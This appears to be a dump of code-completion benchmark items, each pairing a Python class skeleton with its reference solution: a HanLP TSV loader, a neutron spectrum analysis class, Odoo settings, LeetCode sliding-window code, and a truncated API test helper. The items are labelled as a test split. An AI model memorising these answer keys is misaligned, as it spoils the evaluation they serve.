Sentences longer than ``max_seq_len`` will be split into shorter ones if possible. sent_delimiter: Delimiter between sentences, like period or comma, which indicates a long sentence can be split here. char_level: Whether the sequence length is measured at char level, which is never the case for\n- def load_file(self, filepath): Load a ``.tsv`` file. A ``.tsv`` file for tagging is defined as a tab separated text file, where non-empty lines have two columns for token and tag respectively, empty lines mark the end of sentences. Args: filepath: Path to a ``.tsv`` tagging file. .. highlight:: bash .. 
code-block:: bash $ head eng.train.tsv -DOCSTART- O EU S-ORG rejects O German S-MISC call O to O boycott O British S-MISC lamb O\n\n<|skeleton|>\nclass TSVTaggingDataset:\n\n def __init__(self, data: Union[str, List], transform: Union[Callable, List]=None, cache=None, generate_idx=None, max_seq_len=None, sent_delimiter=None, char_level=False, hard_constraint=False, **kwargs) -> None:\n \"\"\"Args: data: The local or remote path to a dataset, or a list of samples where each sample is a dict. transform: Predefined transform(s). cache: ``True`` to enable caching, so that transforms won't be called twice. generate_idx: Create a :const:`~hanlp_common.constants.IDX` field for each sample to store its order in dataset. Useful for prediction when samples are re-ordered by a sampler. max_seq_len: Sentences longer than ``max_seq_len`` will be split into shorter ones if possible. sent_delimiter: Delimiter between sentences, like period or comma, which indicates a long sentence can be split here. char_level: Whether the sequence length is measured at char level, which is never the case for\"\"\"\n <|body_0|>\n\n def load_file(self, filepath):\n \"\"\"Load a ``.tsv`` file. A ``.tsv`` file for tagging is defined as a tab separated text file, where non-empty lines have two columns for token and tag respectively, empty lines mark the end of sentences. Args: filepath: Path to a ``.tsv`` tagging file. .. highlight:: bash .. code-block:: bash $ head eng.train.tsv -DOCSTART- O EU S-ORG rejects O German S-MISC call O to O boycott O British S-MISC lamb O\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.char_level = char_level\n self.hard_constraint = hard_constraint\n self.sent_delimiter = sent_delimiter\n self.max_seq_len = max_seq_len\n super().__init__(data, transform, cache, generate_idx)\n<|end_body_0|>\n\n<|body_start_1|>\n filepath = get_resource(filepath)\n for words, tags in generate_words_tags_from_tsv(filepath, lower=False):\n if self.max_seq_len:\n start = 0\n for short_sents in split_long_sentence_into(words, self.max_seq_len, self.sent_delimiter, char_level=self.char_level, hard_constraint=self.hard_constraint):\n end = start + len(short_sents)\n yield {'token': short_sents, 'tag': tags[start:end]}\n start = end\n else:\n yield {'token': words, 'tag': tags}\n<|end_body_1|>\n", "revision_id": "be2f04905a12990a527417bd47b79b851874a201", "skeleton": "<|skeleton|>\nclass TSVTaggingDataset:\n\n def __init__(self, data: Union[str, List], transform: Union[Callable, List]=None, cache=None, generate_idx=None, max_seq_len=None, sent_delimiter=None, char_level=False, hard_constraint=False, **kwargs) -> None:\n \"\"\"Args: data: The local or remote path to a dataset, or a list of samples where each sample is a dict. transform: Predefined transform(s). cache: ``True`` to enable caching, so that transforms won't be called twice. generate_idx: Create a :const:`~hanlp_common.constants.IDX` field for each sample to store its order in dataset. Useful for prediction when samples are re-ordered by a sampler. max_seq_len: Sentences longer than ``max_seq_len`` will be split into shorter ones if possible. sent_delimiter: Delimiter between sentences, like period or comma, which indicates a long sentence can be split here. char_level: Whether the sequence length is measured at char level, which is never the case for\"\"\"\n <|body_0|>\n\n def load_file(self, filepath):\n \"\"\"Load a ``.tsv`` file. 
A ``.tsv`` file for tagging is defined as a tab separated text file, where non-empty lines have two columns for token and tag respectively, empty lines mark the end of sentences. Args: filepath: Path to a ``.tsv`` tagging file. .. highlight:: bash .. code-block:: bash $ head eng.train.tsv -DOCSTART- O EU S-ORG rejects O German S-MISC call O to O boycott O British S-MISC lamb O\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class TSVTaggingDataset:\n def __init__(self, data: Union[str, List], transform: Union[Callable, List]=None, cache=None, generate_idx=None, max_seq_len=None, sent_delimiter=None, char_level=False, hard_constraint=False, **kwargs) -> None:\n \"\"\"Args: data: The local or remote path to a dataset, or a list of samples where each sample is a dict. transform: Predefined transform(s). cache: ``True`` to enable caching, so that transforms won't be called twice. generate_idx: Create a :const:`~hanlp_common.constants.IDX` field for each sample to store its order in dataset. Useful for prediction when samples are re-ordered by a sampler. max_seq_len: Sentences longer than ``max_seq_len`` will be split into shorter ones if possible. sent_delimiter: Delimiter between sentences, like period or comma, which indicates a long sentence can be split here. char_level: Whether the sequence length is measured at char level, which is never the case for\"\"\"\n self.char_level = char_level\n self.hard_constraint = hard_constraint\n self.sent_delimiter = sent_delimiter\n self.max_seq_len = max_seq_len\n super().__init__(data, transform, cache, generate_idx)\n\n def load_file(self, filepath):\n \"\"\"Load a ``.tsv`` file. A ``.tsv`` file for tagging is defined as a tab separated text file, where non-empty lines have two columns for token and tag respectively, empty lines mark the end of sentences. Args: filepath: Path to a ``.tsv`` tagging file. .. highlight:: bash .. 
code-block:: bash $ head eng.train.tsv -DOCSTART- O EU S-ORG rejects O German S-MISC call O to O boycott O British S-MISC lamb O\"\"\"\n filepath = get_resource(filepath)\n for words, tags in generate_words_tags_from_tsv(filepath, lower=False):\n if self.max_seq_len:\n start = 0\n for short_sents in split_long_sentence_into(words, self.max_seq_len, self.sent_delimiter, char_level=self.char_level, hard_constraint=self.hard_constraint):\n end = start + len(short_sents)\n yield {'token': short_sents, 'tag': tags[start:end]}\n start = end\n else:\n yield {'token': words, 'tag': tags}\n", "source": "the_stack_v2_python_sparse", "source_path": "hanlp/datasets/ner/loaders/tsv.py", "source_repo": "hankcs/HanLP", "split": "test", "star_events_count": 32454} {"blob_id": "67aa310d438af4c15b0fff235b6f3d109c2c00b3", "bodies": ["self.P = 1000\nself.sizes = np.array([0, 2, 3, 5, 8, 10, 12])\nself.calibration = BSS_Calibration()\nself.experiment = self.process_experiment()\nfoil_experiment = Au_Foil_Data()\nfoil_data = Au_Foil_Theoretical(foil_experiment)\nself.nebp_fudge_factor = foil_data.nebp_fudge_factor\nself.calc_responses()\nreturn", "lld = 400\ncounts = np.zeros(len(self.sizes))\n\ndef model(x, A, B, C, D, E):\n \"\"\"Docstring.\"\"\"\n return A * np.exp(-B * x) + C * (1 / np.sqrt(2 * np.pi * D ** 2)) * np.exp(-(x - E) ** 2 / (2 * D ** 2))\nfor i, size in enumerate(self.sizes):\n filename = paths.main_path + '/experiment/4_18_19/bss' + str(size) + '.Spe'\n with open(filename, 'r') as F:\n lines = F.readlines()\n t = int(lines[2065])\n ydata = np.array([int(l) for l in lines[12:2059]])\n ydata = ydata[lld:1900]\n xdata = range(len(ydata))\n popt, pcov = sp.optimize.curve_fit(model, xdata, ydata, p0=[1, 1, 1, 1, 1000])\n counts[i] = popt[2] / t\n fig = plt.figure(i + 200)\n ax = fig.add_subplot(111)\n ax.set_xlabel('Channel')\n ax.set_ylabel('Counts')\n ax.plot(xdata, ydata, color='navy', ls='None', marker='.', markersize=0.3, label='Data')\n ax.plot(xdata, model(xdata, *popt), color='seagreen', label='Model')\n ax.legend()\n fig.savefig('plot/bs{}_spectrum.png'.format(i), dpi=300)\n fig.clear()\ncounts /= self.calibration.efficiency\nreturn counts", "flux_data = extract_mcnp('n', self.P)\nflux = np.sum(flux_data[:, 1:, 1:, 0], axis=(0, 1))\nresponses = response_data()\nresponse_functions = []\nfor name, response in responses.items():\n if 'bs' in name and 'p' not in name:\n response_functions.append(response.int)\nresponse_functions = np.array(response_functions)\nself.responses = np.sum(response_functions * flux, axis=1)\nreturn"], "bodies_text": "<|body_start_0|>\n self.P = 1000\n self.sizes = np.array([0, 2, 3, 5, 8, 10, 12])\n self.calibration = BSS_Calibration()\n self.experiment = self.process_experiment()\n foil_experiment = Au_Foil_Data()\n foil_data = Au_Foil_Theoretical(foil_experiment)\n self.nebp_fudge_factor = foil_data.nebp_fudge_factor\n self.calc_responses()\n return\n<|end_body_0|>\n\n<|body_start_1|>\n lld = 400\n counts = np.zeros(len(self.sizes))\n\n def model(x, A, B, C, D, E):\n \"\"\"Docstring.\"\"\"\n return A * np.exp(-B * x) + C * (1 / np.sqrt(2 * np.pi * D ** 2)) * np.exp(-(x - E) ** 2 / (2 * D ** 2))\n for i, size in enumerate(self.sizes):\n filename = paths.main_path + '/experiment/4_18_19/bss' + str(size) + '.Spe'\n with open(filename, 'r') as F:\n lines = F.readlines()\n t = int(lines[2065])\n ydata = np.array([int(l) for l in lines[12:2059]])\n ydata = ydata[lld:1900]\n xdata = range(len(ydata))\n popt, pcov = sp.optimize.curve_fit(model, xdata, ydata, p0=[1, 1, 1, 
1, 1000])\n counts[i] = popt[2] / t\n fig = plt.figure(i + 200)\n ax = fig.add_subplot(111)\n ax.set_xlabel('Channel')\n ax.set_ylabel('Counts')\n ax.plot(xdata, ydata, color='navy', ls='None', marker='.', markersize=0.3, label='Data')\n ax.plot(xdata, model(xdata, *popt), color='seagreen', label='Model')\n ax.legend()\n fig.savefig('plot/bs{}_spectrum.png'.format(i), dpi=300)\n fig.clear()\n counts /= self.calibration.efficiency\n return counts\n<|end_body_1|>\n\n<|body_start_2|>\n flux_data = extract_mcnp('n', self.P)\n flux = np.sum(flux_data[:, 1:, 1:, 0], axis=(0, 1))\n responses = response_data()\n response_functions = []\n for name, response in responses.items():\n if 'bs' in name and 'p' not in name:\n response_functions.append(response.int)\n response_functions = np.array(response_functions)\n self.responses = np.sum(response_functions * flux, axis=1)\n return\n<|end_body_2|>\n", "class_docstring": "Docstring.", "class_name": "BSS_Data", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass BSS_Data:\n \"\"\"Docstring.\"\"\"\n\n def __init__(self):\n \"\"\"Docstring.\"\"\"\n <|body_0|>\n\n def process_experiment(self):\n \"\"\"Implement after experiment.\"\"\"\n <|body_1|>\n\n def calc_responses(self):\n \"\"\"Docstring.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.P = 1000\n self.sizes = np.array([0, 2, 3, 5, 8, 10, 12])\n self.calibration = BSS_Calibration()\n self.experiment = self.process_experiment()\n foil_experiment = Au_Foil_Data()\n foil_data = Au_Foil_Theoretical(foil_experiment)\n self.nebp_fudge_factor = foil_data.nebp_fudge_factor\n self.calc_responses()\n return\n<|end_body_0|>\n\n<|body_start_1|>\n lld = 400\n counts = np.zeros(len(self.sizes))\n\n def model(x, A, B, C, D, E):\n \"\"\"Docstring.\"\"\"\n return A * np.exp(-B * x) + C * (1 / np.sqrt(2 * np.pi * D ** 2)) * np.exp(-(x - E) ** 2 / (2 * D ** 2))\n for i, size in enumerate(self.sizes):\n filename = paths.main_path + '/experiment/4_18_19/bss' + str(size) + '.Spe'\n with open(filename, 'r') as F:\n lines = F.readlines()\n t = int(lines[2065])\n ydata = np.array([int(l) for l in lines[12:2059]])\n ydata = ydata[lld:1900]\n xdata = range(len(ydata))\n popt, pcov = sp.optimize.curve_fit(model, xdata, ydata, p0=[1, 1, 1, 1, 1000])\n counts[i] = popt[2] / t\n fig = plt.figure(i + 200)\n ax = fig.add_subplot(111)\n ax.set_xlabel('Channel')\n ax.set_ylabel('Counts')\n ax.plot(xdata, ydata, color='navy', ls='None', marker='.', markersize=0.3, label='Data')\n ax.plot(xdata, model(xdata, *popt), color='seagreen', label='Model')\n ax.legend()\n fig.savefig('plot/bs{}_spectrum.png'.format(i), dpi=300)\n fig.clear()\n counts /= self.calibration.efficiency\n return counts\n<|end_body_1|>\n\n<|body_start_2|>\n flux_data = extract_mcnp('n', self.P)\n flux = np.sum(flux_data[:, 1:, 1:, 0], axis=(0, 1))\n responses = response_data()\n response_functions = []\n for name, response in responses.items():\n if 'bs' in name and 'p' not in name:\n response_functions.append(response.int)\n response_functions = np.array(response_functions)\n self.responses = np.sum(response_functions * flux, axis=1)\n return\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000161", "length_bytes": 3669, "license_type": "permissive", "methods": [{"docstring": "Docstring.", "name": "__init__", "signature": "def __init__(self)"}, {"docstring": "Implement after experiment.", "name": "process_experiment", "signature": "def process_experiment(self)"}, 
{"docstring": "Docstring.", "name": "calc_responses", "signature": "def calc_responses(self)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_005021", "prompt": "Implement the Python class `BSS_Data` described below.\n\nClass description:\nDocstring.\n\nMethod signatures and docstrings:\n- def __init__(self): Docstring.\n- def process_experiment(self): Implement after experiment.\n- def calc_responses(self): Docstring.", "prompted_full_text": "Implement the Python class `BSS_Data` described below.\n\nClass description:\nDocstring.\n\nMethod signatures and docstrings:\n- def __init__(self): Docstring.\n- def process_experiment(self): Implement after experiment.\n- def calc_responses(self): Docstring.\n\n<|skeleton|>\nclass BSS_Data:\n \"\"\"Docstring.\"\"\"\n\n def __init__(self):\n \"\"\"Docstring.\"\"\"\n <|body_0|>\n\n def process_experiment(self):\n \"\"\"Implement after experiment.\"\"\"\n <|body_1|>\n\n def calc_responses(self):\n \"\"\"Docstring.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.P = 1000\n self.sizes = np.array([0, 2, 3, 5, 8, 10, 12])\n self.calibration = BSS_Calibration()\n self.experiment = self.process_experiment()\n foil_experiment = Au_Foil_Data()\n foil_data = Au_Foil_Theoretical(foil_experiment)\n self.nebp_fudge_factor = foil_data.nebp_fudge_factor\n self.calc_responses()\n return\n<|end_body_0|>\n\n<|body_start_1|>\n lld = 400\n counts = np.zeros(len(self.sizes))\n\n def model(x, A, B, C, D, E):\n \"\"\"Docstring.\"\"\"\n return A * np.exp(-B * x) + C * (1 / np.sqrt(2 * np.pi * D ** 2)) * np.exp(-(x - E) ** 2 / (2 * D ** 2))\n for i, size in enumerate(self.sizes):\n filename = paths.main_path + '/experiment/4_18_19/bss' + str(size) + '.Spe'\n with open(filename, 'r') as F:\n lines = F.readlines()\n t = int(lines[2065])\n ydata = np.array([int(l) for l in lines[12:2059]])\n ydata = ydata[lld:1900]\n xdata = range(len(ydata))\n popt, pcov = sp.optimize.curve_fit(model, xdata, ydata, p0=[1, 1, 1, 1, 1000])\n counts[i] = popt[2] / t\n fig = plt.figure(i + 200)\n ax = fig.add_subplot(111)\n ax.set_xlabel('Channel')\n ax.set_ylabel('Counts')\n ax.plot(xdata, ydata, color='navy', ls='None', marker='.', markersize=0.3, label='Data')\n ax.plot(xdata, model(xdata, *popt), color='seagreen', label='Model')\n ax.legend()\n fig.savefig('plot/bs{}_spectrum.png'.format(i), dpi=300)\n fig.clear()\n counts /= self.calibration.efficiency\n return counts\n<|end_body_1|>\n\n<|body_start_2|>\n flux_data = extract_mcnp('n', self.P)\n flux = np.sum(flux_data[:, 1:, 1:, 0], axis=(0, 1))\n responses = response_data()\n response_functions = []\n for name, response in responses.items():\n if 'bs' in name and 'p' not in name:\n response_functions.append(response.int)\n response_functions = np.array(response_functions)\n self.responses = np.sum(response_functions * flux, axis=1)\n return\n<|end_body_2|>\n", "revision_id": "bfb3335b24d878f30e41ac099b73ed7668347014", "skeleton": "<|skeleton|>\nclass BSS_Data:\n \"\"\"Docstring.\"\"\"\n\n def __init__(self):\n \"\"\"Docstring.\"\"\"\n <|body_0|>\n\n def process_experiment(self):\n \"\"\"Implement after experiment.\"\"\"\n <|body_1|>\n\n def calc_responses(self):\n \"\"\"Docstring.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class BSS_Data:\n \"\"\"Docstring.\"\"\"\n\n def __init__(self):\n \"\"\"Docstring.\"\"\"\n self.P = 1000\n self.sizes = np.array([0, 2, 3, 5, 8, 10, 12])\n 
self.calibration = BSS_Calibration()\n self.experiment = self.process_experiment()\n foil_experiment = Au_Foil_Data()\n foil_data = Au_Foil_Theoretical(foil_experiment)\n self.nebp_fudge_factor = foil_data.nebp_fudge_factor\n self.calc_responses()\n return\n\n def process_experiment(self):\n \"\"\"Implement after experiment.\"\"\"\n lld = 400\n counts = np.zeros(len(self.sizes))\n\n def model(x, A, B, C, D, E):\n \"\"\"Docstring.\"\"\"\n return A * np.exp(-B * x) + C * (1 / np.sqrt(2 * np.pi * D ** 2)) * np.exp(-(x - E) ** 2 / (2 * D ** 2))\n for i, size in enumerate(self.sizes):\n filename = paths.main_path + '/experiment/4_18_19/bss' + str(size) + '.Spe'\n with open(filename, 'r') as F:\n lines = F.readlines()\n t = int(lines[2065])\n ydata = np.array([int(l) for l in lines[12:2059]])\n ydata = ydata[lld:1900]\n xdata = range(len(ydata))\n popt, pcov = sp.optimize.curve_fit(model, xdata, ydata, p0=[1, 1, 1, 1, 1000])\n counts[i] = popt[2] / t\n fig = plt.figure(i + 200)\n ax = fig.add_subplot(111)\n ax.set_xlabel('Channel')\n ax.set_ylabel('Counts')\n ax.plot(xdata, ydata, color='navy', ls='None', marker='.', markersize=0.3, label='Data')\n ax.plot(xdata, model(xdata, *popt), color='seagreen', label='Model')\n ax.legend()\n fig.savefig('plot/bs{}_spectrum.png'.format(i), dpi=300)\n fig.clear()\n counts /= self.calibration.efficiency\n return counts\n\n def calc_responses(self):\n \"\"\"Docstring.\"\"\"\n flux_data = extract_mcnp('n', self.P)\n flux = np.sum(flux_data[:, 1:, 1:, 0], axis=(0, 1))\n responses = response_data()\n response_functions = []\n for name, response in responses.items():\n if 'bs' in name and 'p' not in name:\n response_functions.append(response.int)\n response_functions = np.array(response_functions)\n self.responses = np.sum(response_functions * flux, axis=1)\n return\n", "source": "the_stack_v2_python_sparse", "source_path": "experiment/bss_in_beam.py", "source_repo": "ericgiunta/nebp", "split": "test", "star_events_count": 0} {"blob_id": "f0ab0569da86f0794dc9af9bcf3226a44e534656", "bodies": ["res = super(ResConfigSettings, self).get_values()\nparams = self.env['ir.config_parameter'].sudo().get_param\npos_all_order = params('pos_all_orders.pos_all_order')\nn_days = params('pos_all_orders.n_days')\nres.update(pos_all_order=pos_all_order, n_days=n_days)\nreturn res", "super(ResConfigSettings, self).set_values()\nself.env['ir.config_parameter'].sudo().set_param('pos_all_orders.pos_all_order', self.pos_all_order)\nself.env['ir.config_parameter'].sudo().set_param('pos_all_orders.n_days', self.n_days)"], "bodies_text": "<|body_start_0|>\n res = super(ResConfigSettings, self).get_values()\n params = self.env['ir.config_parameter'].sudo().get_param\n pos_all_order = params('pos_all_orders.pos_all_order')\n n_days = params('pos_all_orders.n_days')\n res.update(pos_all_order=pos_all_order, n_days=n_days)\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n super(ResConfigSettings, self).set_values()\n self.env['ir.config_parameter'].sudo().set_param('pos_all_orders.pos_all_order', self.pos_all_order)\n self.env['ir.config_parameter'].sudo().set_param('pos_all_orders.n_days', self.n_days)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "ResConfigSettings", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ResConfigSettings:\n\n def get_values(self):\n \"\"\"get values from the fields\"\"\"\n <|body_0|>\n\n def set_values(self):\n \"\"\"Set values in the fields\"\"\"\n 
<|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n res = super(ResConfigSettings, self).get_values()\n params = self.env['ir.config_parameter'].sudo().get_param\n pos_all_order = params('pos_all_orders.pos_all_order')\n n_days = params('pos_all_orders.n_days')\n res.update(pos_all_order=pos_all_order, n_days=n_days)\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n super(ResConfigSettings, self).set_values()\n self.env['ir.config_parameter'].sudo().set_param('pos_all_orders.pos_all_order', self.pos_all_order)\n self.env['ir.config_parameter'].sudo().set_param('pos_all_orders.n_days', self.n_days)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000162", "length_bytes": 4742, "license_type": "no_license", "methods": [{"docstring": "get values from the fields", "name": "get_values", "signature": "def get_values(self)"}, {"docstring": "Set values in the fields", "name": "set_values", "signature": "def set_values(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_004843", "prompt": "Implement the Python class `ResConfigSettings` described below.\n\nClass description:\nImplement the ResConfigSettings class.\n\nMethod signatures and docstrings:\n- def get_values(self): get values from the fields\n- def set_values(self): Set values in the fields", "prompted_full_text": "Implement the Python class `ResConfigSettings` described below.\n\nClass description:\nImplement the ResConfigSettings class.\n\nMethod signatures and docstrings:\n- def get_values(self): get values from the fields\n- def set_values(self): Set values in the fields\n\n<|skeleton|>\nclass ResConfigSettings:\n\n def get_values(self):\n \"\"\"get values from the fields\"\"\"\n <|body_0|>\n\n def set_values(self):\n \"\"\"Set values in the fields\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n res = super(ResConfigSettings, self).get_values()\n params = self.env['ir.config_parameter'].sudo().get_param\n pos_all_order = params('pos_all_orders.pos_all_order')\n n_days = params('pos_all_orders.n_days')\n res.update(pos_all_order=pos_all_order, n_days=n_days)\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n super(ResConfigSettings, self).set_values()\n self.env['ir.config_parameter'].sudo().set_param('pos_all_orders.pos_all_order', self.pos_all_order)\n self.env['ir.config_parameter'].sudo().set_param('pos_all_orders.n_days', self.n_days)\n<|end_body_1|>\n", "revision_id": "4b1bcb8f17aad44fe9c80a8180eb0128e6bb2c14", "skeleton": "<|skeleton|>\nclass ResConfigSettings:\n\n def get_values(self):\n \"\"\"get values from the fields\"\"\"\n <|body_0|>\n\n def set_values(self):\n \"\"\"Set values in the fields\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ResConfigSettings:\n def get_values(self):\n \"\"\"get values from the fields\"\"\"\n res = super(ResConfigSettings, self).get_values()\n params = self.env['ir.config_parameter'].sudo().get_param\n pos_all_order = params('pos_all_orders.pos_all_order')\n n_days = params('pos_all_orders.n_days')\n res.update(pos_all_order=pos_all_order, n_days=n_days)\n return res\n\n def set_values(self):\n \"\"\"Set values in the fields\"\"\"\n super(ResConfigSettings, self).set_values()\n self.env['ir.config_parameter'].sudo().set_param('pos_all_orders.pos_all_order', self.pos_all_order)\n self.env['ir.config_parameter'].sudo().set_param('pos_all_orders.n_days', self.n_days)\n", "source": "the_stack_v2_python_sparse", "source_path": 
"pos_all_orders/models/pos_session.py", "source_repo": "CybroOdoo/CybroAddons", "split": "test", "star_events_count": 209} {"blob_id": "82a41c88b4d63de6023b42384d6335f1a5215a93", "bodies": ["max_data = []\nif len(nums) == 0:\n return max_data\nfor i in range(len(nums) - k + 1):\n max_data.append(max(nums[i:i + k]))\nreturn max_data", "win = []\nres = []\nfor i, v in enumerate(nums):\n if i >= k and i - win[0] >= k:\n win.pop(0)\n while win and v >= nums[win[-1]]:\n win.pop()\n win.append(i)\n if i >= k - 1:\n res.append(nums[win[0]])\nreturn res"], "bodies_text": "<|body_start_0|>\n max_data = []\n if len(nums) == 0:\n return max_data\n for i in range(len(nums) - k + 1):\n max_data.append(max(nums[i:i + k]))\n return max_data\n<|end_body_0|>\n\n<|body_start_1|>\n win = []\n res = []\n for i, v in enumerate(nums):\n if i >= k and i - win[0] >= k:\n win.pop(0)\n while win and v >= nums[win[-1]]:\n win.pop()\n win.append(i)\n if i >= k - 1:\n res.append(nums[win[0]])\n return res\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def maxSlidingWindow(self, nums, k):\n \"\"\":type nums: List[int] :type k: int :rtype: List[int]\"\"\"\n <|body_0|>\n\n def maxSlidingWindow2(self, nums, k):\n \"\"\":type nums: List[int] :type k: int :rtype: List[int]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n max_data = []\n if len(nums) == 0:\n return max_data\n for i in range(len(nums) - k + 1):\n max_data.append(max(nums[i:i + k]))\n return max_data\n<|end_body_0|>\n\n<|body_start_1|>\n win = []\n res = []\n for i, v in enumerate(nums):\n if i >= k and i - win[0] >= k:\n win.pop(0)\n while win and v >= nums[win[-1]]:\n win.pop()\n win.append(i)\n if i >= k - 1:\n res.append(nums[win[0]])\n return res\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000163", "length_bytes": 1291, "license_type": "no_license", "methods": [{"docstring": ":type nums: List[int] :type k: int :rtype: List[int]", "name": "maxSlidingWindow", "signature": "def maxSlidingWindow(self, nums, k)"}, {"docstring": ":type nums: List[int] :type k: int :rtype: List[int]", "name": "maxSlidingWindow2", "signature": "def maxSlidingWindow2(self, nums, k)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005372", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def maxSlidingWindow(self, nums, k): :type nums: List[int] :type k: int :rtype: List[int]\n- def maxSlidingWindow2(self, nums, k): :type nums: List[int] :type k: int :rtype: List[int]", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def maxSlidingWindow(self, nums, k): :type nums: List[int] :type k: int :rtype: List[int]\n- def maxSlidingWindow2(self, nums, k): :type nums: List[int] :type k: int :rtype: List[int]\n\n<|skeleton|>\nclass Solution:\n\n def maxSlidingWindow(self, nums, k):\n \"\"\":type nums: List[int] :type k: int :rtype: List[int]\"\"\"\n <|body_0|>\n\n def maxSlidingWindow2(self, nums, k):\n \"\"\":type nums: List[int] :type k: int :rtype: List[int]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n max_data = []\n if len(nums) == 0:\n return max_data\n for i in range(len(nums) - k + 1):\n max_data.append(max(nums[i:i + k]))\n return 
max_data\n<|end_body_0|>\n\n<|body_start_1|>\n win = []\n res = []\n for i, v in enumerate(nums):\n if i >= k and i - win[0] >= k:\n win.pop(0)\n while win and v >= nums[win[-1]]:\n win.pop()\n win.append(i)\n if i >= k - 1:\n res.append(nums[win[0]])\n return res\n<|end_body_1|>\n", "revision_id": "013f6f222c6c2a617787b258f8a37003a9f51526", "skeleton": "<|skeleton|>\nclass Solution:\n\n def maxSlidingWindow(self, nums, k):\n \"\"\":type nums: List[int] :type k: int :rtype: List[int]\"\"\"\n <|body_0|>\n\n def maxSlidingWindow2(self, nums, k):\n \"\"\":type nums: List[int] :type k: int :rtype: List[int]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def maxSlidingWindow(self, nums, k):\n \"\"\":type nums: List[int] :type k: int :rtype: List[int]\"\"\"\n max_data = []\n if len(nums) == 0:\n return max_data\n for i in range(len(nums) - k + 1):\n max_data.append(max(nums[i:i + k]))\n return max_data\n\n def maxSlidingWindow2(self, nums, k):\n \"\"\":type nums: List[int] :type k: int :rtype: List[int]\"\"\"\n win = []\n res = []\n for i, v in enumerate(nums):\n if i >= k and i - win[0] >= k:\n win.pop(0)\n while win and v >= nums[win[-1]]:\n win.pop()\n win.append(i)\n if i >= k - 1:\n res.append(nums[win[0]])\n return res\n", "source": "the_stack_v2_python_sparse", "source_path": "other/slid_window.py", "source_repo": "terrifyzhao/leetcode", "split": "test", "star_events_count": 0} {"blob_id": "4a3512564d2c6686a7305dcf26fcaa55d3d6e208", "bodies": ["req = self.create_api(get_agent, CoopSts=1, RecordIndex=0, RecordSize=9999)\nagentlist = req.json()['Data']['RecordList']\nself.agentid = None\nfor i in range(len(agentlist)):\n if agentname == agentlist[i]['LaborName']:\n self.agentid = agentlist[i]['SpId']\nreturn self.agentid", "print(entname)\nreq = self.create_api(GetPaySalaryEntList_Api, CoopSts=1, RecordIndex=0, RecordSize=9999)\nprint(req.json())\nentlist = req.json()['Data']['RecordList']\nfor i in range(len(entlist)):\n try:\n if entname == entlist[i]['EntShortName']:\n self.entid = entlist[i]['EntId']\n print(type(self.entid))\n except Exception as e:\n print(e, '未找到标准企业', entname)\nreturn self.entid", "self.SettleBeginDate = SettleBeginDate\nself.SettleEndDate = SettleEndDate\nedit_exc(t1=name, t2=idcadnum, t3=workcard, t4=workdate, t5=workstatus, t7=workday)\nalimport = AlImport()\nalimport.login(self.login_phone)\nalimport.ali_import(myLocalFile=myLocalFile_advance, myObjectName=myObjectName_advance)\nself.get_ent(entname=entname)\nreq = self.create_api(url=WeekBillGen_ImportCheck, SheetName='Sheet1', BucketKey=bucketname, EnterpriseID=self.entid, FileName=myObjectName_advance, SettleBeginDate=SettleBeginDate, SettleEndDate=SettleEndDate)\ntry:\n BizID = req.json()['Data']['BizID']\n for i in range(5):\n req = self.create_api(WeekBillGen_GetImportCheckResult, BizID=BizID, EnterpriseID=self.entid)\n time.sleep(1)\n if req.json()['Data']['State'] == 2:\n break\n req = self.create_api(WeekBillGen_GenerateBatchByBizID, ImportBizID=BizID, EnterpriseID=self.entid)\n bizid = req.json()['Data']['BizID']\n print(bizid)\n for i in range(5):\n req = self.create_api(WeekBillGen_GetGenerateBatchResult, BizID=bizid, EnterpriseID=self.entid)\n time.sleep(1)\n if req.json()['Data']['State'] == 2:\n break\nexcept Exception as e:\n print(e, req.json())", "if BeginDt is None or EndDt is None:\n BeginDt = self.SettleBeginDate\n EndDt = self.SettleEndDate\nif Entname is not 
